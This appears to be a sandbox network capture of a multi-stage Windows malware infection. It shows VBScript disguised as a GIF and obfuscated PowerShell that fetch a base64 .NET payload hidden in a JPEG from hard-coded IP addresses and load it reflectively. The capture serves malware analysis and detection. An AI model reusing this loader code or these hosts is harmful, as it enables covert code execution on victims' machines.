Jul 5, 2024 07:16:41.047250032 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 05 Jul 2024 05:16:40 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Thu, 04 Jul 2024 07:48:03 GMT ETag: "da2-61c672ab351dc" Accept-Ranges: bytes Content-Length: 3490 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/gif Data Raw: ff fe 44 00 69 00 6d 00 20 00 43 00 64 00 69 00 71 00 63 00 6e 00 61 00 47 00 57 00 70 00 57 00 73 00 53 00 78 00 69 00 47 00 6b 00 52 00 47 00 68 00 63 00 65 00 4c 00 4c 00 5a 00 57 00 6d 00 4b 00 47 00 54 00 57 00 47 00 4c 00 41 00 48 00 75 00 69 00 6b 00 64 00 4b 00 63 00 71 00 4c 00 68 00 70 00 6f 00 66 00 69 00 66 00 55 00 75 00 78 00 64 00 4c 00 4a 00 4b 00 69 00 63 00 53 00 50 00 4c 00 43 00 63 00 7a 00 57 00 7a 00 50 00 57 00 52 00 55 00 6e 00 51 00 74 00 64 00 4e 00 55 00 6f 00 5a 00 6c 00 67 00 57 00 4c 00 66 00 49 00 50 00 65 00 4c 00 6e 00 52 00 76 00 64 00 5a 00 50 00 57 00 4b 00 42 00 6a 00 4c 00 62 00 65 00 2c 00 20 00 43 00 65 00 62 00 6e 00 6a 00 4c 00 64 00 41 00 63 00 4c 00 42 00 69 00 69 00 57 00 73 00 69 00 47 00 41 00 47 00 67 00 5a 00 4e 00 51 00 69 00 4a 00 4c 00 47 00 41 00 47 00 43 00 55 00 55 00 65 00 68 00 6b 00 55 00 63 00 4e 00 69 00 4c 00 49 00 69 00 51 00 57 00 69 00 69 00 47 00 4c 00 55 00 7a 00 57 00 76 00 57 00 69 00 62 00 69 00 65 00 72 00 4f 00 4b 00 41 00 65 00 [TRUNCATED] Data Ascii: Dim CdiqcnaGWpWsSxiGkRGhceLLZWmKGTWGLAHuikdKcqLhpofifUuxdLJKicSPLCczWzPWRUnQtdNUoZlgWLfIPeLnRvdZPWKBjLbe, CebnjLdAcLBiiWsiGAGgZNQiJLGAGCUUehkUcNiLIiQWiiGLUzWvWibierOKAeWkPmZdUNzkktsfNaKqsGcTRLiitWfZOzxWILGGSet CdiqcnaGWpWsSxiGkRGhceLLZWmKGTWGLAHuikdKcqLhpofifUuxdLJKicSPLCczWzPWRUnQtdNUoZlgWLfIPeLnRvdZPWKBjLbe = CreateObject("MSXML2.ServerXMLHTTP")CdiqcnaGWpWsSxiGkRGhceLLZWmKGTWGLAHuikdKcqLhpofifUuxdLJKicSPLCczWzPWRUnQtdNUoZlgWLfIPeLnRvdZPWKBjLbe.Open "GE
Jul 5, 2024 07:16:41.047272921 CEST	224	IN	Data Raw: 54 00 22 00 2c 00 20 00 22 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 39 00 31 00 2e 00 39 00 32 00 2e 00 32 00 35 00 34 00 2e 00 31 00 34 00 2f 00 55 00 73 00 65 00 72 00 73 00 5f 00 41 00 50 00 49 00 2f 00 73 00 79 00 73 00 63 00 6f 00 72 00 Data Ascii: T", "http://91.92.254.14/Users_API/syscore/file_uidvpgdd.pgo.txt", FalseCdiqcnaGWpWsSxiGkRGhceLLZWmKGTWGLAHuik
Jul 5, 2024 07:16:41.047288895 CEST	1236	IN	Data Raw: 64 00 4b 00 63 00 71 00 4c 00 68 00 70 00 6f 00 66 00 69 00 66 00 55 00 75 00 78 00 64 00 4c 00 4a 00 4b 00 69 00 63 00 53 00 50 00 4c 00 43 00 63 00 7a 00 57 00 7a 00 50 00 57 00 52 00 55 00 6e 00 51 00 74 00 64 00 4e 00 55 00 6f 00 5a 00 6c 00 Data Ascii: dKcqLhpofifUuxdLJKicSPLCczWzPWRUnQtdNUoZlgWLfIPeLnRvdZPWKBjLbe.SendIf CdiqcnaGWpWsSxiGkRGhceLLZWmKGTWGLAHuikdKcqLhpofifU
Jul 5, 2024 07:16:41.047305107 CEST	1104	IN	Data Raw: 42 00 4c 00 73 00 4c 00 4f 00 4a 00 63 00 4f 00 47 00 69 00 4b 00 4c 00 4b 00 4a 00 20 00 3d 00 20 00 43 00 72 00 65 00 61 00 74 00 65 00 4f 00 62 00 6a 00 65 00 63 00 74 00 28 00 22 00 57 00 53 00 63 00 72 00 69 00 70 00 74 00 2e 00 53 00 68 00 Data Ascii: BLsLOJcOGiKLKJ = CreateObject("WScript.Shell") OphTrAAjPkAfixILzZbLTSgWiWmkUhqUsfchLluZWLkGcoKaAGbKSrGLeALZUsTWRnxbms

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.22	49174	91.92.254.14	80	3136	C:\Windows\SysWOW64\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 07:16:41.602045059 CEST	209	OUT	GET /Users_API/syscore/file_uidvpgdd.pgo.txt HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Language: en-US User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: 91.92.254.14
Jul 5, 2024 07:16:42.221237898 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 05 Jul 2024 05:16:42 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Thu, 04 Jul 2024 07:48:04 GMT ETag: "f12-61c672ab74119" Accept-Ranges: bytes Content-Length: 3858 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain Data Raw: ef bb bf 28 27 59 52 43 6c 69 6e 6b 20 3d 20 53 45 47 68 74 74 70 3a 2f 2f 27 2b 27 39 31 2e 39 32 2e 32 35 34 2e 31 39 34 2f 27 2b 27 69 6d 67 65 2f 6e 65 77 2d 69 6d 61 67 65 5f 76 2e 6a 70 27 2b 27 67 53 45 47 3b 20 59 52 43 77 65 62 43 6c 69 65 6e 74 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 4e 65 74 2e 57 65 62 43 6c 69 65 6e 74 27 2b 27 3b 20 74 72 79 20 7b 20 59 52 43 64 6f 77 6e 6c 6f 61 64 65 64 44 61 74 61 20 3d 20 59 52 43 77 65 62 43 6c 69 65 6e 74 2e 44 6f 77 6e 6c 6f 61 64 44 61 74 61 28 59 52 43 6c 69 6e 6b 29 20 7d 20 63 61 74 63 68 20 7b 20 57 72 69 74 65 2d 48 6f 73 74 20 53 45 47 46 61 69 6c 65 64 20 54 6f 20 64 6f 77 6e 6c 6f 61 64 20 64 61 74 61 20 66 72 6f 6d 20 59 52 43 6c 69 6e 6b 53 45 47 20 2d 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 20 52 65 64 3b 20 65 78 69 27 2b 27 74 20 7d 3b 20 69 66 20 28 59 52 43 64 6f 77 6e 6c 6f 61 64 65 64 44 61 74 61 20 2d 6e 65 20 59 52 43 6e 75 6c 6c 29 20 7b 20 59 52 43 69 6d 61 67 65 54 65 78 74 20 3d 20 5b 53 79 73 [TRUNCATED] Data Ascii: ('YRClink = SEGhttp://'+'91.92.254.194/'+'imge/new-image_v.jp'+'gSEG; YRCwebClient = New-Object System.Net.WebClient'+'; try { YRCdownloadedData = YRCwebClient.DownloadData(YRClink) } catch { Write-Host SEGFailed To download data from YRClinkSEG -ForegroundColor Red; exi'+'t }; if (YRCdownloadedData -ne YRCnull) { YRCimageText = [System.Text.Encoding]::UTF8.GetString(YR'+'CdownloadedData); YRCstartFlag = SEG<<BASE64_START>>SEG; YRCendFlag = SEG<<BASE64_END>>SEG; YRCstartIndex = YRCimageText.IndexO'+'f(YRCstartFlag); '+'YRCendIndex = YRCimageTe'+'xt.IndexOf(YRCen'+'dFlag); if (YRCstartIndex -ge 0 -and YRCendIndex -gt YRCstartIndex) { YRCstartIndex += YRCstartFlag.Length; YRCbase64Length'+' = YRCendIndex '+'- YRCstartIndex; Y'+'RCbase64Command = YRCimageText.Substring(YRCstartIndex, YRCbase64Length); YRCcommandBytes = [System.Convert]::FromBas'+'e64'+'String(YR'+'Cbas'+'e64Command);'+' YRCloadedAssembly = [Syst
Jul 5, 2024 07:16:42.221273899 CEST	1236	IN	Data Raw: 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 41 73 73 65 6d 62 6c 79 5d 3a 3a 4c 6f 27 2b 27 61 64 28 59 52 43 63 6f 6d 6d 61 6e 64 42 79 74 65 73 29 3b 20 59 52 43 74 79 70 65 20 3d 20 59 52 43 6c 6f 61 64 65 27 2b 27 64 41 73 73 65 6d 62 6c 79 2e Data Ascii: em.Reflection.Assembly]::Lo'+'ad(YRCcommandBytes); YRCtype = YRCloade'+'dAssembly.GetType(SEGRunPE.'+'HomeSEG); YRCmethod = '+'YRCtype.GetMethod(SEGVAISEG).Invoke(YRCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptth'+'SEG , SEGdesativ
Jul 5, 2024 07:16:42.221282959 CEST	1236	IN	Data Raw: 64 65 64 41 73 73 65 6d 62 6c 79 20 3d 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 41 73 73 65 6d 62 6c 79 5d 3a 3a 4c 6f 61 64 28 59 52 43 63 6f 6d 6d 27 2b 27 61 6e 64 42 79 74 65 73 29 3b 20 59 52 43 74 79 70 65 20 3d 20 59 52 Data Ascii: dedAssembly = [System.Reflection.Assembly]::Load(YRCcomm'+'andBytes); YRCtype = YRCloadedAssembly.GetType(SEGRunPE'+'.HomeSEG); YRCmethod = YRCtype.GetMethod(SEGVAISEG).Invoke(Y'+'RCnull, [object[]] (SEGtxt.SSERW/23099/831.65.232.271//:ptthSE'
Jul 5, 2024 07:16:42.221354008 CEST	461	IN	Data Raw: 43 6f 6d 6d 61 6e 64 29 3b 20 59 52 43 6c 6f 61 64 65 64 41 73 73 65 6d 62 6c 79 20 3d 20 5b 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 2e 41 73 73 65 6d 62 6c 79 5d 3a 3a 4c 6f 61 64 28 59 52 43 63 6f 6d 27 2b 27 6d 61 6e 64 42 79 74 65 Data Ascii: Command); YRCloadedAssembly = [System.Reflection.Assembly]::Load(YRCcom'+'mandBytes); YRCtype = YRCloadedAssembly.GetType(SEGRunPE.HomeSEG); YRCmethod = YRCtype.GetMethod(SEGVAISEG).Invoke(YRCnull, [object[]] (SEGtxt.SSERW/23099/'+'831.6'+'5.2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.22	49175	91.92.254.194	80	3196	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 07:16:44.924412966 CEST	83	OUT	GET /imge/new-image_v.jpg HTTP/1.1 Host: 91.92.254.194 Connection: Keep-Alive
Jul 5, 2024 07:16:45.572416067 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 05 Jul 2024 05:16:45 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Last-Modified: Wed, 03 Jul 2024 13:17:15 GMT ETag: "67fd9-61c57a629b9c6" Accept-Ranges: bytes Content-Length: 425945 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: image/jpeg Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1 d1 52 62 f0 15 72 82 92 e1 24 33 a2 b2 d2 f1 16 43 53 c2 08 34 63 17 25 35 36 73 93 e2 26 44 83 54 74 b3 c3 18 a3 d3 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff c4 00 14 11 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#BRbr$3CS4c%56s&DTt?~5sRM9RWhco#4q7[B6v^Tgc"TY_xWeXBX50xFs,/Qcq2lyoT^=ofRGZ>(O5ceu;XG8s!u_.?,~XW!?$[8j=>gA>jz[WX)jO:q3n3VmmPo.TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B,xGU5Pay'rErv^uYt70ur$UxA-OF9>uI^O^gy4Ap
Jul 5, 2024 07:16:45.572433949 CEST	224	IN	Data Raw: 99 a5 de dc d9 e7 e1 ce 43 2e e2 4a 8e 39 fe 78 02 c9 15 df 24 ae de 08 e7 2c 17 69 24 8e 7b 60 55 94 81 c7 4c a8 bb e3 ae 15 ce e5 07 b6 50 29 ea 0d 60 10 48 c8 01 dc 6f b8 39 7f 3d ea fd 23 e0 3b e0 36 37 b7 d7 2c 8b 66 89 a0 d8 06 67 04 05 2b Data Ascii: C.J9x$,i${`ULP)`Ho9=#;67,fg+{NmXm2CS(+"]meHR87j(3N{d"a``QX;e0`Y8l`XLOn{eXadN(ma]pQ
Jul 5, 2024 07:16:45.572452068 CEST	1236	IN	Data Raw: f7 72 19 58 8b 1d 70 91 49 4a 19 fa 9c ed 49 90 3a 84 7b de 2b e5 80 a4 69 24 84 28 5b 55 26 b1 97 89 c4 65 9c 52 a8 e0 63 10 ed 81 42 05 dc 3b 9f 7c 99 7c c4 47 60 39 ae 3e 18 09 92 b1 ed 61 5e 66 f6 f4 9e c0 67 e8 ef b0 7e 20 66 fd 90 f8 2f 84 Data Ascii: rXpIJI:{+i$([U&eRcB;\|\|G`9>a^fg~ f/\|Dt?Rsbo;if3fe~<().\U~n;T?WLYW,V;t?7 X~al{2&y!S4pjV3JEP JIw$8
Jul 5, 2024 07:16:45.572518110 CEST	1236	IN	Data Raw: 17 e0 30 21 17 5c 80 44 59 58 aa 8a 05 ba 0c ed 60 f1 08 e0 43 3c 8a d1 83 6a 01 53 59 0b 04 b2 4b 61 f7 1b a0 72 35 ba 3d 42 c9 02 49 23 32 48 2b e0 0d e0 7a 7f d9 b2 ea a7 fb 63 e1 d2 19 14 e9 d5 a5 2c bb 85 9f dd 30 e9 9f 5e d2 f8 5e 87 c3 c6 Data Ascii: 0!\DYX`C<jSYKar5=BI#2H+zc,0^^AHq7[GWu:xR_2P00u>!%gj_YtVR, \^3x-Yb>?hF`ms0~~".C7mW4fgp~4q3
Jul 5, 2024 07:16:45.572536945 CEST	1236	IN	Data Raw: 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00 fa 87 8e 68 19 64 e5 58 1e 7d b3 c1 69 f4 cd ad fb 40 9a 7b 12 c1 09 34 5b a0 5e b9 ec 5e 3f bc a3 23 Data Ascii: W(=+EDhyS+z`a(hdX}i@{4[^^?#nx!x9,z"Ta~C!C3@8`mFfYk0?g3OWa4vA{`)D^*'8^U]H,^`&!Sgk&iNTS3B
Jul 5, 2024 07:16:45.572587013 CEST	672	IN	Data Raw: d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f Data Ascii: fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW\|Rm\LITUTVlD#v aT@v@b^}E./bU4lSHC(#h'FIo\|$vd^b
Jul 5, 2024 07:16:45.651916027 CEST	1236	IN	Data Raw: 66 63 c8 f9 65 03 79 a4 21 b2 3a 71 db 03 2e c8 9c 24 7b 9a fa fc 06 07 ba 3a c5 79 3c b6 3b 59 7b 91 f8 be 58 b6 b4 02 37 6d e7 bf c7 25 cd 2d 06 2c 3f 17 06 b1 43 36 d6 28 cc d4 dc 82 47 4f ae 00 1d 03 03 e9 c0 ec 01 b6 ed e9 8e 05 3b 6a ab db Data Ascii: fcey!:q.${:y<;Y{X7m%-,?C6(GO;j\0U!BcG\|"y nGg. &C*Q^G#qQ$q"pH9`zjxW.VzHIG+V<GAFcqtMEgf`O>tA\o
Jul 5, 2024 07:16:45.651942968 CEST	1236	IN	Data Raw: b4 b7 5c 10 66 00 ed 41 c7 52 70 04 94 d3 2d 1d a4 b1 fe 43 3e e1 f6 47 4a fa 8f d9 77 85 42 8c 81 a6 f1 2d 44 44 c8 c1 7f 1e 9e 64 ee 47 f8 bf f7 e9 9f 0d 7b 0e 18 2f 3f a6 7d ab ec 46 a3 4e 9f b2 c8 75 5a e7 61 1c 3e 36 d2 46 b1 d1 26 a2 06 8f Data Ascii: \fARp-C>GJwB-DDdG{/?}FNuZa>6F&,5UjRG"*{w9?j_H}HO3z9IxoVBjlqQ8eILh,/g>o}+I~:$
Jul 5, 2024 07:16:45.651959896 CEST	1236	IN	Data Raw: cd 75 46 06 58 be fd 14 a5 18 f4 a8 82 d7 d6 b3 16 27 94 fd a0 d5 b0 1b a4 30 81 ea eb d1 70 32 cc c7 c6 4b 95 0a 46 a2 1b 1d ba 1c 0f 4b f6 cb c7 a2 d4 f8 bf 86 6b 22 13 2a ab 02 c8 c4 15 0a ac ad c5 73 d8 67 ae 97 ed 8e 88 23 21 d3 3b 29 17 b8 Data Ascii: uFX'0p2KFKk"*sg#!;)\|+MYe6]M}GBV)/n^X f{ U/Mv0nQ)R{dvhn C_oz>hqw>qJh,O]4(M3=$prNHs1ixp}
Jul 5, 2024 07:16:45.652056932 CEST	1236	IN	Data Raw: d4 1c 0f 4e 9f 69 74 e0 12 21 90 df 52 5b ae 43 f8 ee 9e 48 c0 30 c8 2f b8 6a 39 85 0c 04 8d bd 47 be 1a 5d 2b 42 02 b9 36 39 aa c0 d9 8b c5 b4 0e a5 3c 89 41 5f e2 26 f0 4d e2 30 ed 67 11 b5 76 e4 0f ae 66 42 db 45 91 57 c5 e1 9d 4a a8 25 41 07 Data Ascii: Nit!R[CH0/j9G]+B69<A_&M0gvfBEWJ%A(F ey{=^,<7Rg:)%Y14eJ<auz})TI"p=Fqp0kfpU\|/e>Oq};3FYmxa\|I'4J:B=
Jul 5, 2024 07:16:45.652074099 CEST	896	IN	Data Raw: 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 42 e4 92 48 35 d8 60 43 fe 06 51 cd 9b 19 78 95 96 15 60 8a 2c d1 c9 82 64 8c 16 64 26 f0 ab 3c 0e de a4 60 09 ba be d8 02 fb Data Ascii: 80/`vI<R@i$!@BH5`CQx`,dd&<`iA<i;As-#@+4e8L04~s1v{5esq1ibdd0C,)(uhtmoT8PdH*rv#e)v;@Ish

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.22	49176	172.232.56.138	80	3196	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 07:16:46.861531973 CEST	79	OUT	GET /99032/WRESS.txt HTTP/1.1 Host: 172.232.56.138 Connection: Keep-Alive
Jul 5, 2024 07:16:47.490062952 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 05 Jul 2024 05:16:47 GMT Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30 Last-Modified: Thu, 04 Jul 2024 07:26:00 GMT ETag: "a1000-61c66dbce326b" Accept-Ranges: bytes Content-Length: 659456 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/plain Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 67 4b 50 49 79 44 62 38 77 45 50 73 77 44 43 37 77 2f 4f 63 76 44 73 37 51 35 4f 30 74 44 56 37 41 7a 4f 51 6f 44 37 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44 4e 7a 41 6a 4d 6b 4b 44 6f 79 51 6f 4d 41 4b 44 66 79 41 6e 4d 59 4a 44 53 79 67 6a 4d 6f 49 44 47 78 67 65 4d 59 48 44 31 78 41 64 4d 4d 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 73 47 44 71 78 51 61 4d 67 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 65 78 51 58 4d 77 42 41 41 41 77 49 41 48 41 42 41 41 41 67 50 6b 36 44 6b 2b 67 6f 50 30 35 44 62 2b 51 6d 50 63 35 44 57 2b 41 6c 50 38 34 44 4e 2b 41 69 50 59 34 44 45 2b 67 67 50 45 34 44 41 39 77 66 50 34 33 44 38 39 77 65 50 6b 33 44 30 39 67 63 50 30 32 44 72 39 51 61 50 63 32 44 65 39 41 [TRUNCATED] Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8gKPIyDb8wEPswDC7w/OcvDs7Q5O0tDV7AzOQoD76wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgODNzAjMkKDoyQoMAKDfyAnMYJDSygjMoIDGxgeMYHD1xAdMMHDyxQcMAHDvxgbMsGDqxQaMgGDnxgZMUGDkxwYMIGDexQXMwBAAAwIAHABAAAgPk6Dk+goP05Db+QmPc5DW+AlP84DN+AiPY4DE+ggPE4DA9wfP43D89wePk3D09gcP02Dr9QaPc2De9AXPo1DZ9gUPo0DJ9gAPozDy8gKPIyDa8gEPowDC7g+OIvDq7g4OotDS7gyOIoD66gsOoqDi6gmOIpDK6QiOIkD65gcOomDi5wWOolDY5AUOgkDA4AOOAjDo4AIOghDQ4ACOEcD+3g9N4eDm3g3NYdDO3ghN4bD52wtNYbD02gsNAbDv2ApNIaDf2glNIZDR2giNkYDD2ggNAUD51AeNYXDp1gZN4VDb1AUNsUDJ1ASNcUDF1wQNEQD80gONkTD40gNNQTDy0QLNsSDm0AJNMSDi0AIN4RDc0wFNURDU0gENARDO0QDNYQDFzw/MsPDuzA7MkODlzA2MYNDTzwzMIMDAyQvMkLDsygqMcKDjyglMQJDRyQjMAED+xweMcHDqxAaMUGDhxAVMIFDPxwCM4DD8wQOMcDD1wAKMYCDjwQIM8BDSwAEM0ADLwQCAAEAkAYA4AAAA/A/Po/D3/w8PY+Dk/Q4P09DQ/gzPs8DH/wgP47Dt+wqPg6Dk+AoPs5DK+AiPU4DB9AdPInDe5AWOYlDV5AVOAlDP5wSOUkDD5gQOEkDA4wPO4jD64QOOUjDv4QLOwiDr4
Jul 5, 2024 07:16:47.490089893 CEST	1236	IN	Data Raw: 67 4b 4f 6b 69 44 6f 34 41 4a 4f 4d 69 44 66 34 51 47 4f 63 68 44 57 34 51 46 4f 51 68 44 54 34 77 44 4f 34 67 44 4b 34 41 42 4f 49 67 44 42 34 41 77 4e 38 66 44 2b 33 67 2b 4e 6b 66 44 31 33 77 37 4e 30 65 44 73 33 77 36 4e 63 65 44 6d 33 67 34 Data Ascii: gKOkiDo4AJOMiDf4QGOchDW4QFOQhDT4wDO4gDK4ABOIgDB4AwN8fD+3g+NkfD13w7N0eDs3w6NceDm3g4NEeDd3w1NUdDU3A0NocDI3wxNYcDF3QgNsbD62AtNIbDx2AsN8aDu2gqNkaDl2wnN0ZDc2AmNcZDT2QjNsYDK2QiNUYDE2AQNoXD41wdNYXD11QcNAXDs1gZNQWDj1gYNEWDd1AXNgVDS1AUN8UDO1gSNkUDF0wPN
Jul 5, 2024 07:16:47.490099907 CEST	1236	IN	Data Raw: 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44 62 37 51 32 4f 63 74 44 Data Ascii: xDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj5QYO8lDd
Jul 5, 2024 07:16:47.491154909 CEST	1236	IN	Data Raw: 77 77 4f 49 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 55 53 44 6b 30 77 49 4e 49 53 44 68 30 41 49 4e 38 52 44 65 30 51 48 4e 77 52 44 62 30 67 47 4e 6b 52 44 59 30 77 46 4e 59 52 44 55 30 77 45 4e 49 52 44 52 30 41 45 4e 38 51 44 4e 30 67 43 Data Ascii: wwOIAAAAAOAFAOAAAANUSDk0wINISDh0AIN8RDe0QHNwRDb0gGNkRDY0wFNYRDU0wENIRDR0AEN8QDN0gCNkQDI0wBNYQDF0ABNMQDB0AwM8PD+zQ/MwPD7zg+MgPD2AAAAcBQBQDgOsrD66QuOgrD36gtOUrD06wsOIrDx6AsO8qDu6QrOwqDr6gqOkqDo6wpOYqDl6ApOMqDi6QoOAqDf6gnO0pDc6wmOopDZ6AmOcpDW6QlO
Jul 5, 2024 07:16:47.491167068 CEST	1236	IN	Data Raw: 79 44 6a 38 51 49 50 38 78 44 64 38 77 47 50 6b 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 Data Ascii: yDj8QIP8xDd8wGPkxDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv
Jul 5, 2024 07:16:47.491178989 CEST	1236	IN	Data Raw: 41 33 50 6d 39 44 58 2f 49 31 50 49 39 6a 50 2f 49 7a 50 6e 38 54 48 2f 4d 78 50 4a 34 7a 2f 2b 51 75 50 4a 37 6a 70 2b 4d 6f 50 6f 35 6a 58 2b 51 6c 50 4b 35 44 51 2b 59 6a 50 73 34 6a 49 2b 67 68 50 4f 34 44 42 39 6f 66 50 77 33 6a 35 39 77 64 Data Ascii: A3Pm9DX/I1PI9jP/IzPn8TH/MxPJ4z/+QuPJ7jp+MoPo5jX+QlPK5DQ+YjPs4jI+ghPO4DB9ofPw3j59wdPS3Dy94bP12jj9YYPv1zS98APRzDl8gFPJxjO8cwO/vzO7MzOroz464rOcqzd6gmOZlDl4Y0Neejg24vNhPTFz8gM7LT3yssMGHzZxMTMCAD/wUJAAAAtAUAcAAAA/o6Pb+zj/83Pi9jW/AjPp7Ty+0rPx6Tn+EpP
Jul 5, 2024 07:16:47.491189957 CEST	1236	IN	Data Raw: 33 44 6d 39 41 55 50 77 30 6a 4a 39 6b 52 50 50 30 44 41 38 59 4f 50 66 7a 44 32 38 45 4e 50 65 79 54 69 38 51 49 50 7a 78 54 61 38 73 45 50 76 77 54 48 38 73 77 4f 38 76 6a 67 36 6b 6e 4f 53 6c 7a 35 35 41 63 4f 62 59 6a 55 32 4d 54 4e 46 58 6a Data Ascii: 3Dm9AUPw0jJ9kRPP0DA8YOPfzD28ENPeyTi8QIPzxTa8sEPvwTH8swO8vjg6knOSlz55AcObYjU2MTNFXja1kAN9QDM0gyM7LTxyIoMhJTWyEkMtEDYxEDMBDjdw4GAAAAbAQA4A8j8/s+Pr+DT/8hPc7T0+gsPk6jf+YnPX4zD98dPO3TI8QLPUyTZ80FPFxTO7I/OevDp7AkO1rD76MuONrTw6MqObqDk6coOxpzW6AiOVoDD
